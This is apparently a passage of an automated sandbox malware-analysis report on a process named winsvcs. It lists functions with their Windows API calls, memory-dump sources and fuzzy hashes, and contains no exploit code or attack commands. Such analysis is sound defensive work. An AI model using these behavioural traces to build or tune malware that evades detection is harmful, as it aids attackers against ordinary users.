Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: C8E00275D0020CEF8F05DF95D94599DBBB5EB18210F108199ED14A7351D6319A60DF91

Function 02203764 Relevance: 1.3, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 02203781

Memory Dump Source

Source File: 00000009.00000002.2608158110.0000000002203000.00000040.00001000.00020000.00000000.sdmp, Offset: 02203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2203000_winsvcs.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: 281106b1ace4744e20895f5fd5b5fd2d12c8de09b0a1e453adab172a4b2cc718
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction Fuzzy Hash: BDE02D79D0020CAF8B41EFA9D54589CFBB5EB08210F1081AAEC58A7351E631AA64DF91

Non-executed Functions

Function 00426E9B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EDA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDB6
UnhandledExceptionFilter.KERNEL32(00440498), ref: 0042EDC1
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDDD
TerminateProcess.KERNEL32(00000000), ref: 0042EDE4

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction ID: 23f69739ab82ab60ae37d22de6363e677c78d496a800df86a2d8b411d35bdd9f
Opcode Fuzzy Hash: d807d79a081c4084f9f33e00fbe26a34d941df4cfadf5ee3c08c5c6df0428713
Instruction Fuzzy Hash: AA21E0BC9042449FE711DF69FC496497BA0FB4A310F80107AE50997BA5E7B4A984CF8D

Function 0041411E Relevance: 56.5, APIs: 31, Strings: 1, Instructions: 454memorystringCOMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 00414162
GetWindowLongA.USER32(?,000000FC), ref: 00414176
SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
DestroyWindow.USER32(?), ref: 004141B0
IsWindow.USER32(?), ref: 004141B7
GetCurrentProcess.KERNEL32 ref: 00414206
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
GetParent.USER32(?), ref: 00414263
GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
GetSysColor.USER32(0000000F), ref: 0041428D
GetSysColor.USER32(00000005), ref: 00414297
GetWindowLongA.USER32(?,000000F0), ref: 004143A9
GetWindowLongA.USER32(?,000000F0), ref: 004143C4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
VariantInit.OLEAUT32(?), ref: 0041444B
VariantClear.OLEAUT32(?), ref: 0041445D
SysAllocString.OLEAUT32(?), ref: 00414471
VariantClear.OLEAUT32(?), ref: 004144B1
VariantClear.OLEAUT32(?), ref: 004144BC
RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
GlobalFix.KERNEL32(00000000), ref: 004145D1
_memcpy_s.LIBCMT ref: 004145E2
GetWindowLongA.USER32(?,000000FC), ref: 004146A8
SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6

Strings

4D, xrefs: 004142AA

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$Variant$Clear$AllocColorGlobalRedraw$CacheClassCurrentDestroyFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
String ID: 4D
API String ID: 1509809736-4064760932
Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A

Function 00420FC0 Relevance: 36.2, APIs: 24, Instructions: 206windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 00420FE0
GetClipBox.GDI32(00000000,?), ref: 00421001
CreateCompatibleDC.GDI32(?), ref: 0042100B
LPtoDP.GDI32(?,?,00000002), ref: 0042101C
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00421038
SelectObject.GDI32(?,00000000), ref: 00421047
DPtoLP.GDI32(?,?,00000002), ref: 00421058
SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
SetBkMode.GDI32(00000001,00000001), ref: 00421078
SelectObject.GDI32(?,?), ref: 0042108A
GetClientRect.USER32(?,?), ref: 004210AA
SetBkColor.GDI32(?,?), ref: 004210BA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
SetBkColor.GDI32(?,?), ref: 004210E8

Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD

GetScrollPos.USER32(?,00000001), ref: 0042111F
OffsetRect.USER32(?,00000000,00000000), ref: 00421132
OffsetRect.USER32(?,00000000,?), ref: 004211D9
SelectObject.GDI32(?,00000000), ref: 004211F6
SetBkMode.GDI32(?,00000000), ref: 00421201
BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 0042123F
SelectObject.GDI32(?,?), ref: 0042124D
DeleteObject.GDI32(?), ref: 0042125C
DeleteDC.GDI32(?), ref: 0042127F
EndPaint.USER32(?,?), ref: 0042128E

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Object$ColorRectSelect$Offset$ClipCompatibleCreateDeleteModePaintText$BeginBitmapClientDrawEdgeScrollWindow
String ID:
API String ID: 4279685224-0
Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56

Function 0041FE80 Relevance: 33.3, APIs: 22, Instructions: 268COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0041FF4B
CreateCompatibleDC.GDI32(?), ref: 0041FF59
SelectObject.GDI32(?,?), ref: 0041FF6D
SelectObject.GDI32(?,?), ref: 0041FFB8
DeleteDC.GDI32(00000000), ref: 0041FFD4
ReleaseDC.USER32(?,?), ref: 0041FFE2
InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
InterlockedDecrement.KERNEL32(?), ref: 0042002D
GetDC.USER32(?), ref: 00420051
SelectObject.GDI32(?,?), ref: 00420065
SetRectEmpty.USER32(?), ref: 00420084
DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
SelectObject.GDI32(?,00000000), ref: 004200BB
ReleaseDC.USER32(?,?), ref: 004200D4
InterlockedDecrement.KERNEL32(?), ref: 004200EC
GetDC.USER32(?), ref: 00420110
SelectObject.GDI32(?,?), ref: 00420124
SetRectEmpty.USER32(?), ref: 00420143
DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
SelectObject.GDI32(?,00000000), ref: 0042017A
ReleaseDC.USER32(?,?), ref: 00420193
InterlockedDecrement.KERNEL32(?), ref: 004201AB

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ObjectSelect$DecrementInterlocked$Release$DrawEmptyRectText$CompatibleCreateDelete
String ID:
API String ID: 1917333124-0
Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A

Function 00410C90 Relevance: 25.6, APIs: 17, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410CAC
RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3

Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9

FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
LockResource.KERNEL32(00000000), ref: 00410D1A
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
LockResource.KERNEL32(00000000), ref: 00410D37
DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
GetLastError.KERNEL32 ref: 00410D71
GlobalHandle.KERNEL32(00000000), ref: 00410D7E
GlobalFree.KERNEL32(00000000), ref: 00410D85
SetLastError.KERNEL32(00000000), ref: 00410DA3
GetLastError.KERNEL32 ref: 00410DAB
GetLastError.KERNEL32 ref: 00410DBA
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
String ID:
API String ID: 825656904-0
Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D

Function 00423370 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 172registryclipboardCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
LoadCursorA.USER32(00000000,00007F00), ref: 00423402
RegisterClassExA.USER32(00000030), ref: 00423425
__recalloc.LIBCMT ref: 00423479
GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
RegisterClassExA.USER32(00000030), ref: 00423541
__recalloc.LIBCMT ref: 00423587
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9

Strings

0, xrefs: 004234F0

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
String ID: 0
API String ID: 664480883-4108050209
Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E

Function 004212B0 Relevance: 21.3, APIs: 14, Instructions: 279windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32(?,?), ref: 004212DA
SetBkColor.GDI32(?,00000001), ref: 0042132A
SetBkColor.GDI32(?,?), ref: 0042133F
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
SetBkColor.GDI32(?,00000000), ref: 00421367
DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
CopyRect.USER32(?,?), ref: 00421461
SetTextColor.GDI32(?,?), ref: 004214CC
DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
SetTextColor.GDI32(?,?), ref: 00421567
SetTextColor.GDI32(?,00000000), ref: 004215F2
DrawFocusRect.USER32(?,?), ref: 0042160D

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
String ID:
API String ID: 2048994688-0
Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55

Function 004137D7 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 0041380D
GetWindowLongA.USER32(?,000000FC), ref: 00413821
SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
DestroyWindow.USER32(?), ref: 0041385B
IsWindow.USER32(?), ref: 00413862
GetCurrentProcess.KERNEL32 ref: 004138AC
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
RedrawWindow.USER32(?,00000000,00000000,00000507,?,00000001,00000000), ref: 00413937
GetWindowLongA.USER32(?,000000FC), ref: 0041394F
SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D
DestroyWindow.USER32(?), ref: 00413989

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$DestroyRedraw$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 3160769009-0
Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718

Function 0041A790 Relevance: 16.6, APIs: 11, Instructions: 142registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
RegCloseKey.ADVAPI32(?), ref: 0041A7E8
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
RegCloseKey.ADVAPI32(?), ref: 0041A89E
GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
RegCloseKey.ADVAPI32(?), ref: 0041A91D
RegCloseKey.ADVAPI32(?), ref: 0041A937
RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
RegCloseKey.ADVAPI32(?), ref: 0041A96C

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
String ID:
API String ID: 2624191705-0
Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6

Function 00414E99 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00414ED1
GetClientRect.USER32(?,?), ref: 00414EF5
CreateCompatibleDC.GDI32(?), ref: 00414F05
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00414F25
SelectObject.GDI32(00000000,00000000), ref: 00414F37
DeleteObject.GDI32(00000000), ref: 00414F45
FillRect.USER32(?,?,00000006), ref: 00414F63

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CompatibleCreateObjectRect$BitmapClientDeleteFillSelect
String ID:
API String ID: 4020371940-0
Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65

Function 004281EA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
__crt_waiting_on_module_handle.LIBCMT ref: 00428207

Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A

__lock.LIBCMT ref: 00428262
InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
__lock.LIBCMT ref: 00428283
___addlocaleref.LIBCMT ref: 004282A1

Strings

KERNEL32.DLL, xrefs: 004281F6, 004281FB, 00428206

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C

Function 00417549 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004175AD
SysStringLen.OLEAUT32 ref: 004175BA
SysStringLen.OLEAUT32 ref: 004175C7
_memcpy_s.LIBCMT ref: 004175E5

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: String$Free_memcpy_s
String ID:
API String ID: 2083054645-0
Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99

Function 0042B460 Relevance: 9.3, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0042B561
__FindPESection.LIBCMT ref: 0042B57B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8

Function 00418F70 Relevance: 9.1, APIs: 6, Instructions: 114stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
_memcpy_s.LIBCMT ref: 00418FDB
_memcpy_s.LIBCMT ref: 00419018

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: _memcpy_slstrlen
String ID:
API String ID: 2392212498-0
Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759

Function 00416F60 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00416FBC
GetDeviceCaps.GDI32(00000000,00000058), ref: 00416FC7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00416FD3
ReleaseDC.USER32(00000000,00000000), ref: 00416FE0
MulDiv.KERNEL32(000009EC), ref: 00416FF0
MulDiv.KERNEL32(000009EC,?,?), ref: 00417005

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e71172333e862c4ea81034a526fcd2c3146ee9f9be5889f184ede4a7547ebeca
Instruction ID: 42750f41ef34324517b4a613354de802db7d77789f1efda8bfac445f8f3058b2
Opcode Fuzzy Hash: e71172333e862c4ea81034a526fcd2c3146ee9f9be5889f184ede4a7547ebeca
Instruction Fuzzy Hash: 90318D75644700AFE7209F24CC84BABBBF9FF49701F00452DFA8A9A391D7B5A841CB25

Function 00411A09 Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
GetCurrentThreadId.KERNEL32 ref: 00411A29
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
GetCurrentProcess.KERNEL32 ref: 00411A8E
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75

Function 00411F4C Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
GetCurrentThreadId.KERNEL32 ref: 00411F69
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
GetCurrentProcess.KERNEL32 ref: 00411FCE
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75

Function 004157E2 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?), ref: 00415827
ClientToScreen.USER32(?,?), ref: 00415839
GetParent.USER32(?), ref: 00415842
ScreenToClient.USER32(00000000), ref: 00415850
ScreenToClient.USER32(00000000,?), ref: 00415860
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

